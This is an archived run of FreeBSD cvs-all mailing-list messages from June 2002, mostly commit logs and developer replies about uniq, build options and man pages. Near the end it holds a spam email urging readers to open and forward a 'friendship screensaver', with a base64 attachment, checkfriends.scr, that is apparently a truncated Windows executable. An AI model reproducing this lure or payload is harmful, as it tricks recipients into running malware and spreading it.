-0700 (PDT) (envelope-from tjr) Message-Id: <200206210708.g5L78Yu98512@freefall.freebsd.org> From: "Tim J. Robbins" Date: Fri, 21 Jun 2002 00:08:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/uniq uniq.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/21 00:08:34 PDT Modified files: usr.bin/uniq uniq.c Log: Newline characters should not participate in line comparisons. Only apparent when -s is used or the last line of the file is missing a newline. Noticed by the textutils test suite. MFC after: 1 week Revision Changes Path 1.21 +22 -4 src/usr.bin/uniq/uniq.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 0:31: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9607037B417; Fri, 21 Jun 2002 00:30:51 -0700 (PDT) Received: (from ru@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L7Up004655; Fri, 21 Jun 2002 00:30:51 -0700 (PDT) (envelope-from ru) Message-Id: <200206210730.g5L7Up004655@freefall.freebsd.org> From: Ruslan Ermilov Date: Fri, 21 Jun 2002 00:30:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/share/mk bsd.obj.mk X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ru 2002/06/21 00:30:51 PDT Modified files: share/mk bsd.obj.mk Log: Quiet ``make objlink'' when NOOBJ is defined. PR: bin/21142 Submitted by: Craig Leres Revision Changes Path 1.44 +3 -1 src/share/mk/bsd.obj.mk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 0:59:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 45EDB37B41C; Fri, 21 Jun 2002 00:59:32 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L7xWg11865; Fri, 21 Jun 2002 00:59:32 -0700 (PDT) (envelope-from tjr) Message-Id: <200206210759.g5L7xWg11865@freefall.freebsd.org> From: "Tim J. Robbins" Date: Fri, 21 Jun 2002 00:59:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/uniq uniq.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/21 00:59:31 PDT Modified files: usr.bin/uniq uniq.c Log: Skip fields in the manner required by POSIX, and the way V7 did it. MFC after: 1 week Revision Changes Path 1.22 +7 -9 src/usr.bin/uniq/uniq.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 1: 3:25 2002 Delivered-To: cvs-all@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 9B7F837B400; Fri, 21 Jun 2002 01:03:00 -0700 (PDT) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.12.3/8.12.2) with ESMTP id g5L81ACn029699; Fri, 21 Jun 2002 10:01:10 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "David E. O'Brien" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT avail In-Reply-To: Your message of "Thu, 20 Jun 2002 17:10:02 PDT." <200206210010.g5L0A2j06495@freefall.freebsd.org> Date: Fri, 21 Jun 2002 10:01:10 +0200 Message-ID: <29698.1024646470@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I see no "Approved by: core" in this email ? In message <200206210010.g5L0A2j06495@freefall.freebsd.org>, "David E. O'Brien" writes: >obrien 2002/06/20 17:10:02 PDT > > Modified files: > . avail > Log: > People's gratiuous commits have caused us to not get an updated tcpdump > import due to the pain of 30 conflicts. So prevent anyone from creating > the 31st conflict. > While I'm here take preventive measures for binutils and file. > > Revision Changes Path > 1.187 +4 -0 CVSROOT/avail > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 1:51:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6567D37B407; Fri, 21 Jun 2002 01:51:04 -0700 (PDT) Received: (from mbr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L8p4e21472; Fri, 21 Jun 2002 01:51:04 -0700 (PDT) (envelope-from mbr) Message-Id: <200206210851.g5L8p4e21472@freefall.freebsd.org> From: Martin Blapp Date: Fri, 21 Jun 2002 01:51:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors/openoffice/files patch-psprint::source::printergfx::psheader.ps X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mbr 2002/06/21 01:51:04 PDT Added files: editors/openoffice/files patch-psprint::source::printergfx::psheader.ps Log: Two typos in the postscript header for printing fixed - one if them is about Euro symbol, (merged from the development branch of the package). This patch is a slight generalisation of the one provided in NetBSD PR pkg/17130 Obtained from: NetBSD, Revision Changes Path 1.1 +13 -0 ports/editors/openoffice/files/patch-psprint::source::printergfx::psheader.ps (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 1:54: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CFF8C37B409; Fri, 21 Jun 2002 01:54:03 -0700 (PDT) Received: (from ru@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L8s3M21734; Fri, 21 Jun 2002 01:54:03 -0700 (PDT) (envelope-from ru) Message-Id: <200206210854.g5L8s3M21734@freefall.freebsd.org> From: Ruslan Ermilov Date: Fri, 21 Jun 2002 01:54:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src Makefile.inc1 src/etc Makefile src/secure/lib Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ru 2002/06/21 01:54:03 PDT Modified files: . Makefile.inc1 etc Makefile secure/lib Makefile Log: Make NO_OPENSSL actually imply NO_OPENSSH, as documented in make.conf(5). Revision Changes Path 1.292 +2 -2 src/Makefile.inc1 1.286 +4 -5 src/etc/Makefile 1.26 +2 -2 src/secure/lib/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 1:57:32 2002 Delivered-To: cvs-all@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id EF13437B40D; Fri, 21 Jun 2002 01:56:56 -0700 (PDT) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.6/8.11.2) id g5L8uI957859; Fri, 21 Jun 2002 11:56:18 +0300 (EEST) (envelope-from ru) Date: Fri, 21 Jun 2002 11:56:18 +0300 From: Ruslan Ermilov To: Kris Kennaway Cc: Maxim Sobolev , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src Makefile.inc1 Message-ID: <20020621085618.GH42492@sunbay.com> References: <200206161424.g5GEOqo76198@freefall.freebsd.org> <20020616105041.D23689@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="hk6Zb6cduJ+I0Tmj" Content-Disposition: inline In-Reply-To: <20020616105041.D23689@xor.obsecurity.org> User-Agent: Mutt/1.3.99i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --hk6Zb6cduJ+I0Tmj Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jun 16, 2002 at 10:50:41AM -0700, Kris Kennaway wrote: > On Sun, Jun 16, 2002 at 07:24:52AM -0700, Maxim Sobolev wrote: > > sobomax 2002/06/16 07:24:52 PDT > >=20 > > Modified files: > > . Makefile.inc1=20 > > Log: > > Don't try to build libssh if NO_OPENSSL is defined because NO_OPENSSL= implies > > NO_OPENSSH. >=20 > Historically we've required that people set both, i.e. they're not > covering locks. If you want to make them into covering locks then > you'll have a lot more work on your hands, because this change is not > complete. >=20 NO_OPENSSL was documented to imply NO_OPENSSH for a long time now. The actual support is now complete: 1.292 +2 -2 src/Makefile.inc1 1.286 +4 -5 src/etc/Makefile 1.26 +2 -2 src/secure/lib/Makefile Cheers, --=20 Ruslan Ermilov Sysadmin and DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age --hk6Zb6cduJ+I0Tmj Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9EuoyUkv4P6juNwoRApLOAJ9/z5nfxRTEi+45KBmXK6MA7npYzQCfahGc eUX/RYepE1pOdNnYxRBCENU= =0NPs -----END PGP SIGNATURE----- --hk6Zb6cduJ+I0Tmj-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 1:59:43 2002 Delivered-To: cvs-all@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 70A9937B408; Fri, 21 Jun 2002 01:59:02 -0700 (PDT) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.6/8.11.2) id g5L8wqv58136; Fri, 21 Jun 2002 11:58:52 +0300 (EEST) (envelope-from ru) Date: Fri, 21 Jun 2002 11:58:52 +0300 From: Ruslan Ermilov To: Doug Barton Cc: Kris Kennaway , Maxim Sobolev , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src Makefile.inc1 Message-ID: <20020621085852.GI42492@sunbay.com> References: <200206161424.g5GEOqo76198@freefall.freebsd.org> <20020616105041.D23689@xor.obsecurity.org> <3D0CD6F2.86EB2958@FreeBSD.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="Rex5+51txc1ort/q" Content-Disposition: inline In-Reply-To: <3D0CD6F2.86EB2958@FreeBSD.org> User-Agent: Mutt/1.3.99i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --Rex5+51txc1ort/q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jun 16, 2002 at 11:20:34AM -0700, Doug Barton wrote: > Kris Kennaway wrote: > >=20 > > On Sun, Jun 16, 2002 at 07:24:52AM -0700, Maxim Sobolev wrote: > > > sobomax 2002/06/16 07:24:52 PDT > > > > > > Modified files: > > > . Makefile.inc1 > > > Log: > > > Don't try to build libssh if NO_OPENSSL is defined because NO_OPENS= SL implies > > > NO_OPENSSH. > >=20 > > Historically we've required that people set both, i.e. they're not > > covering locks. If you want to make them into covering locks then > > you'll have a lot more work on your hands, because this change is not > > complete. >=20 > Also, people might have their own version of openssl lying around for > ssh to link with. >=20 Just speaking in theory? Most SSH bits were not built in the NO_OPENSSL case, this change just brought more (but incomplete) consistency. Cheers, --=20 Ruslan Ermilov Sysadmin and DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age --Rex5+51txc1ort/q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9EurMUkv4P6juNwoRAtApAJ0TWhL/trIQUNVjXBLRU1kkJjYIPACfeqsL 7i4H8KzbG8h/QA4RbdT56SI= =2hqK -----END PGP SIGNATURE----- --Rex5+51txc1ort/q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 2:23:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4CA3F37B410; Fri, 21 Jun 2002 02:23:12 -0700 (PDT) Received: (from phk@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L9NCD28729; Fri, 21 Jun 2002 02:23:12 -0700 (PDT) (envelope-from phk) Message-Id: <200206210923.g5L9NCD28729@freefall.freebsd.org> From: Poul-Henning Kamp Date: Fri, 21 Jun 2002 02:23:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/xlint/llib llib-lposix X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG phk 2002/06/21 02:23:12 PDT Modified files: usr.bin/xlint/llib llib-lposix Log: #include before to get timespec. Revision Changes Path 1.3 +1 -0 src/usr.bin/xlint/llib/llib-lposix To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 2:57:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6E60E37B409; Fri, 21 Jun 2002 02:56:38 -0700 (PDT) Received: (from des@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L9ucF32319; Fri, 21 Jun 2002 02:56:38 -0700 (PDT) (envelope-from des) Message-Id: <200206210956.g5L9ucF32319@freefall.freebsd.org> From: Dag-Erling Smorgrav Date: Fri, 21 Jun 2002 02:56:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libfetch Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG des 2002/06/21 02:56:38 PDT Modified files: lib/libfetch Makefile Log: Fix incorrect library ordering. I thought I'd committed this already... Revision Changes Path 1.31 +2 -2 src/lib/libfetch/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 2:57:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2431337B4E2; Fri, 21 Jun 2002 02:57:35 -0700 (PDT) Received: (from bde@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5L9vYB32376; Fri, 21 Jun 2002 02:57:34 -0700 (PDT) (envelope-from bde) Message-Id: <200206210957.g5L9vYB32376@freefall.freebsd.org> From: Bruce Evans Date: Fri, 21 Jun 2002 02:57:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sbin/tunefs tunefs.8 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bde 2002/06/21 02:57:34 PDT Modified files: sbin/tunefs tunefs.8 Log: Don't say that an umounted filesystem is required for -n. An unmounted filesystem is no more or less required for -n than for any other option. The previous commit clarified the actual requirement. Revision Changes Path 1.22 +0 -1 src/sbin/tunefs/tunefs.8 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Fri Jun 21 3: 3:40 2002 Delivered-To: cvs-all@freebsd.org Received: from mail.FreeBSD.org (i0820.vwr.wanadoo.nl [194.134.211.56]) by hub.freebsd.org (Postfix) with SMTP id F173637B407 for ; Fri, 21 Jun 2002 03:03:08 -0700 (PDT) From: cassy_qt To: cvs-all@FreeBSD.org Subject: Fw: charming Love to ur lovers ! Date: Fri,21 Jun 2002 12:01:06 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=secxrvx Message-Id: <20020621100308.F173637B407@hub.freebsd.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --secxrvx Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi
Check the Attachement ..
See u

cassy_qt

----- Original Message -----
From: "lovers" < shakeit@lovers.com >
To: < cassy_qt@hotmail.com >
Sent: Fri,21 Jun 2002 12:01:06 PM
Subject: charming Love to ur lovers !


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.lovers.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://lovers.com/remove?freescreensaver
* Enter your email address (cassy_qt@hotmail.com) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address cassy_qt@hotmail.com
X-PMG-Recipient: cassy_qt@hotmail.com
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--secxrvx Content-Type: application/octet-stream; name=checkfriends.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="checkfriends.scr" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAABXZioCEwdEURMHRFETB0RRkBtKUR4HRFH7GE5RCQdEURMHRFEQB0RRcRhX UR4HRFETB0VRkAdEUfsYT1EWB0RRqwFCURIHRFFSaWNoEwdEUQAAAAAAAAAAUEUAAEwBAwC+0QI9 AAAAAAAAAADgAA8BCwEGAABgAAAAEAAAAOAAAABLAQAA8AAAAFABAAAAQAAAEAAAAAIAAAQAAAAA AAAABAAAAAAAAAAAYAEAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AAAYVwEApAEAAABQAQAYBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAuLi4wAAAAAADgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgLi4uMQAAAAAA YAAAAPAAAABeAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAABQAQAACgAAAGIAAAAA AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAkLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLiAkCgAuLi4hDAkCCVblYQe3/adfWykBAPdaAAAAAAEAJgMAm337 //+LRCQEi8iKEITSdA2A8r2IEYpRAUEMdfPDkP///48AVleLfCQMvvzQQACLBlBX6AMAVvyDxAiF wHUT8l/+/4PGBIH+sNFAAHzlX7gBAF7DXzPAXsOQt7fdB4HsIBpTVUdowNMq/xW7u//d5KBJ2IXb iVwkGA+EQhyLNegTaLDft993HlP/1micB4v4CYvoaIQLiW227e1sJCgNhf+JqhQxCYXta3fLswcB wPl4aNAHBJo127+9V4eL8JwEhfaJdCQcGuWNpvseuzQQUB9W/9cvwBSL++9d+zPtwegCEFQQD46r FN6LC1FqS9q3p3v/Dx+m7PBJdHSNVH72trXvRSRSagRQQwwwNHRfiwe7+Xb/JI1MJCxoBIZRUhck R418E7e7X3iDyf8G8q730Uk2LFFQTKihYXMjLL9CD00SUkZhs20vdAlyVm7wg8dP371uZP/YEfiA nEWDwwQ7vq5h++gPjF//AIszi9pW63w8/Gbr6VNbEF9eXVuBxGjDhe/WLG8oVVRqAmTYRD/3ZOGD /f8KggTHAyBQVYa30H0d0n9kax196Alpxr499L6nDjRadwi7F4wYUB/XEQUMuobL2NvTBcoQEGAQ dusYeVHMJ66dW1XPnDDOdl2kKB9kAwvurYudDIK8JIAOsD/tuobuAA8Aa9z/aDGAVizU4XPPzgwH MMwH0A0ogO7cz8ItCIQkeDyFFI2UrWvd1yaEiwtSR6hRI1zYNJgEuxgQUjgAoPDPUIiqOoPDiy0A lnXf20uNhDpFIDTVLK5waxYUByBShBgYTT7bkGcrNAIk/B0U4bHQ4RiG/ieFVsqywdxh0/VF1EHV NCdD9okPwZREjA35LI9Qi0RRUlDm3uywV8fNIJKOp7PwYY/np4P4AvKtY4PsPawhsKqELnUNjlVe NWAdUqkNQTUE6VjVyyCXfPu5d5yYINaD6AXGtEVRVyexdzaYNldjvz03hdO9p1YEuA4yBAswCbEM cSt0TL2MALKMUR8QAe3t1Y14CG4MR7hoWNQt13U0TQICDGFk4hgity7sQhwjaEwaSVwAoWzL3TUw FmjEDtZgIAvf/SmWr0ufmbkJlPf5ixSVnJMO4XDMQALWWBBdQ8t1jYAiBIwBbDCFIFu7aA2AUNBg Qx3MtrkjJx1TEkyzPVuXO4UQYywnnPjCJr11xnzxdRJTEWC3nu1YAQRXKqDo5XUGR/en21fpnQZk ejPJM/bQQxB99/e3B3Yqi9WB6sSB+Sk9cxqKhAr3f2/3DotdiIEJKEE7yHLeVcYPL7+Vj2OY6+t0 v/AFsCA7e/vvbyoUc1SKlC4OgPo6fAUEQH4KCbNvf3N6fTB/FDrQdCAIDXUmRlHIdsn3R0HrHQ8L DQqRwsKePQJGR4t8pnHiEBZeIYfuUVNUwQ7zkN+wl6wAWXKdgiYOZ05ccQ7hEF57A8NGBNf40Ax+ OdNScAmOhXp2M3FXZGEGg23wCW1XB+RADrBWF1ZNyc5hpVcrF7yfMyedAKlYsBJo3mVPjqxLmKGk AlhrZ2bApEAUV5A9sJkcZ1Sv0R1s1GymM6qBaAVkJTDMA66F/d6Vmg22/XPECYXSfjWJOBQU+uaN He5rFooXiP8XjVSJh2ALHVBO/Ugxeq1J+HXPVYYc4t+Z3WXr1lYCV7kQw75outmDNet45vOlpOkT MM6RkMrtksCTkaUTdyQR31aJyQnLi+hVoFZ+POHrxKgRVY9Q/yG85ewZIJ6HflcagVxgoBZGmtDF U3Qkgk7ttwycJfnnIXmKBFgT//8WRsHgCDv1fQsz24ocFgPDbhQStf+3A4vQFPoSg+I/ilQUeIgX Drv5HrINDFcBDgaD4D83K/DdXxOKRAQXAohHA34DBP0mfn89jUUBO/AKAj3xQYP5E3U1a2fhcNsQ G8bbyEPTme4KB4HxSFDnWmuYcDRQU9yZKMBe9gubLRVBhclrxkSMKABFHBjABjWLrww9zWALVDVS ZwdDpC7cUJk2aQZLOJBRlPpELGTpWxJQU1D1Bo8Or09+/3QEEnAG3qsKxwV8RhrPdqYT+rhMG6rM 7EnICe9DBV5XM/+4z4k9L8Bg5BKp/KEQLFwyt3NMG59oG94AohvflP0793UjvQxXTQLeQv9zrCTY g/v/dQ2wxafvnm7NImPk33AIHzvHdQ/xH+TSahl8DKLrBA+/QAhmx/Hv2MCY1GaFHotWDGoQiwKb oQs9R1IsCIn2ohDHLmSRoljQYAt3f3IPplh2FCXNCkyhgNf1ZnLZ0m90D4vtIO16UHgj1xA7xSkQ w6kWSP0FInhs4G6m7Dn0Hg6l2CjknuG1V8S7GO3aP+Z0SDmsgIl1P5wzGxbchBss18OKHw6EZrvm UkQa4N+Z3het6V4sJCbGAk72EbZO1yykh3UOg7ywvlfeIlSFOwFy+1VpvtjDFnVLUm1QjEGY4y18 jnlmI+G64nDBgFCIvs4d62t2D2i8O194ILRoJLPtC1HHLXQn1Tci32s+fBlhUlak323P5lgtqh+c 39V2KLvYOdKjJt9AXBM2HbXh7zR8JQzrUKlkGxZLMGdn65EqPGSwc/QUDTjNY+7szK5wfEJWdxTT dLYZwGNsWrivCmfkYN+kUZ+6oS1CPS4QeC0Yosdpe/XbTEi0nFcdnWNG1VMjtFxwagVLyBlyUbxs hvnIJTOjeH5mZffSpAF8aoKOH1rGdnHotUwhcg6w1SXIF/6PpHkFSIPI/kAB/v7//+h25VFk3k8N Xaj4h4Bh5rlw6MFQcGyYmd78H+stUwwJM/7AAXUjRytMhjQYlh8usCZIKBQCLSWUSyZ7M29mlUDd 2CUNksQUZGqQjAcyYSNRZpRSPF0sIV9euDgFWQjh8V4qB+HAoTjpBQ85yDfND5ZoaDDeQIAI8OtG oMjgIBRqSgkEvd6bPOmQIDNYZV25NZloLNFAC5Q7nDwX8lJoFGyETIvBprlQUVQQ3l3zuVOyp7AI hnlRNCMD9hVRIATWilxoxoWLEuZ1LMjDvmbAkyE24N/JAHZgGVcAnr0ZLw5O0g743Www18WlWGxj JFAgWBu/ty8gg/+SaIzIQx42MHvs3XAb5CGbE2zf62Lc3Y/sLDYvJFKc6zJ2tmRz6mOUUXCgC2SH RLcdsYNkTQZ814xYqXNYm3DPdicZS3Jo6ViEIJKCTSBQIJEPjJWxy6xYDMnIL2ZOY0zdAEt2lb1o 0DyYxQl52RkYLPzcvOQF2eTcpLMLyNwP4RKSRTAnsNywF8ghmIzcr2ySiJx43ElAMpMDe8CfuWgx iwwCaQYbMD5gfgwswrcW7qIiIQ9hXxCE2+PkZEyIDkjbjP2zJCMRmlG8pJk5kFDaZpPCygXTFR1Z AZiQXhYZ5O6E2gAs2QTyJh94IA5ADghmVAVM2nMhh+wtbFzLRDx7KbAt+5r0HiQXMoE8NJBXUqyu lyTaUNIB5G4U2tY8jK7feCDrEQoPO8zZyAnhhETZKwjZ2aEETpTYF4TXIM3oJkNIgRIgK+yBlyTr FQ8S/BsJvMiQ1jtaO3KBbAwDioSHFWAXfEpArEAOWA5k1lmrsk5/pjGGPiV0I2CLDIW0TWGDdAlj JMsPrzkIBs5Uoic41kJ2kwkskjIdIGGKVK+wOZoc9sIdMwJ0KzUk4i3jkNMTbxuyIDBIOVukZZML ORwQ+EJOctgorwCYIA/jskST1etfp8jV7CXkITIds9DkwkK2tNCMnunMt2DASLSBMMQAjEVPPMzR Mw2EUv1RsNU4kM7gDbwjV4zAbED8mMFeV+QAEodArITVAfmSLfkoVxIOsJB0eagWMiHwaNXzwMIi CB3G37FdyCUxT3xMKbYyknf2EYIihL0rRIwgWMhV9kuDPEIOWJziAPzcJCYTcuTcyJ4nEnIKENWF 